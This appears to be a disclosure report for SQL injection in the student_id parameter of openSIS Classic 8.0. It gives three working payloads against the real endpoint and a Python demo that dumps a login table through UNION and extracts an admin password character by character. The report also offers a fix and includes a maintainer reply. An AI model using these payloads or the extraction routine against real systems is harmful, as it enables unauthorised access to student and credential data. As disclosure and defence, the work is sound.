Due to a lack of protection, the parameter student_id in /modules/eligibility/Student.php can be abused to inject SQL queries to extract information from the database.
POC:
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=(SELECT (CASE WHEN (5146=5146) THEN 15 ELSE (SELECT 5608 UNION SELECT 5507) END))&ajax=true
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 AND 2719=BENCHMARK(5000000,MD5(0x5246526f))&ajax=true
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: /openSIS-Classic-8.0/Ajax.php?modname=eligibility/Student.php&student_id=15 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706271,0x6b67466d72447a6e53786a6d4c527a71657250527871584356544f484c4a417a494c48637847576d,0x7170786b71),NULL,NULL-- -&ajax=true
Traceback:
openSIS-Classic-8.0/modules/eligibility/Student.php
Solution:
Use the function sqlSecurityFilter() before assigning $_REQUEST['student_id'] into the "SELECT" query.
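What the three sqlmap findings above mean in practice, as an added example (not openSIS code and not the reporter's): the request value is concatenated straight into a SELECT, so a boolean condition or a UNION appended to student_id becomes part of the query, and a remote attacker can turn the row-count difference into a yes/no oracle and read arbitrary tables. The schema (a five-column students table, matching the 5-column UNION payload, plus a login table), the sample rows and the query shape are constructed assumptions; the demo uses SQLite, so the MySQL-specific BENCHMARK() and 0x-hex payloads are not reproduced. The hardened variant uses an integer cast plus a bound parameter as a stand-in for sqlSecurityFilter(), whose actual behaviour the page does not show.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the openSIS database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE students(student_id INTEGER, first_name TEXT, last_name TEXT,
                              grade_id INTEGER, status TEXT);
        INSERT INTO students VALUES (15, 'Ada',  'Lovelace', 9,  'active');
        INSERT INTO students VALUES (16, 'Alan', 'Turing',   10, 'active');
        CREATE TABLE login(username TEXT, password TEXT);
        INSERT INTO login VALUES ('admin', 'secret-hash');
    """)
    return conn


def eligibility_vulnerable(conn, student_id):
    """Mirrors the reported pattern: $_REQUEST['student_id'] pasted into the SELECT."""
    sql = ("SELECT student_id, first_name, last_name, grade_id, status "
           "FROM students WHERE student_id=" + str(student_id))
    return conn.execute(sql).fetchall()


def blind_oracle(conn, condition):
    """Boolean-based blind: the page only leaks whether a row came back, which is
    enough to ask arbitrary true/false questions about other tables."""
    rows = eligibility_vulnerable(conn, "15 AND (" + condition + ")")
    return len(rows) > 0


def extract_blind(conn, scalar_sql, alphabet="abcdefghijklmnopqrstuvwxyz-", max_len=16):
    """Recover a string one character at a time through the boolean oracle
    (the manual equivalent of what sqlmap automates for the first finding)."""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "(SELECT substr((" + scalar_sql + ")," + str(pos) + ",1))='" + ch + "'"
            if blind_oracle(conn, cond):
                out += ch
                break
        else:
            break  # no candidate matched: end of string
    return out


def eligibility_hardened(conn, student_id):
    """Fix: validate the type, then bind the value so it can never become SQL.
    (Assumed stand-in for sqlSecurityFilter(); openSIS's own filter is not shown.)"""
    try:
        sid = int(str(student_id).strip())
    except ValueError:
        raise ValueError("student_id must be an integer")
    sql = ("SELECT student_id, first_name, last_name, grade_id, status "
           "FROM students WHERE student_id=?")
    return conn.execute(sql, (sid,)).fetchall()


def hardened_rejects(conn, value):
    """True when the hardened handler refuses a tampered student_id."""
    try:
        eligibility_hardened(conn, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Boolean-based blind: 1=1 keeps the row, 1=2 drops it.
    print(len(eligibility_vulnerable(db, "15 AND 1=1")), len(eligibility_vulnerable(db, "15 AND 1=2")))
    # UNION: the third column carries data from an unrelated table.
    print(eligibility_vulnerable(db, "15 UNION ALL SELECT NULL,NULL,password,NULL,NULL FROM login-- -"))
    print(extract_blind(db, "SELECT password FROM login WHERE username='admin'"))
    print(hardened_rejects(db, "15 AND 1=1"), eligibility_hardened(db, "15"))
```

The UNION payload on the page only places a marker string in column 3; replacing the CONCAT() with a real column, as the demo does, is the step from "injectable" to "data exposed", which is why the fix must be type validation plus a bound parameter rather than stripping a few characters.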
We appreciate your observation and would like to inform you that your suggestion has been implemented. Please check and let us know your feedback in case you have any.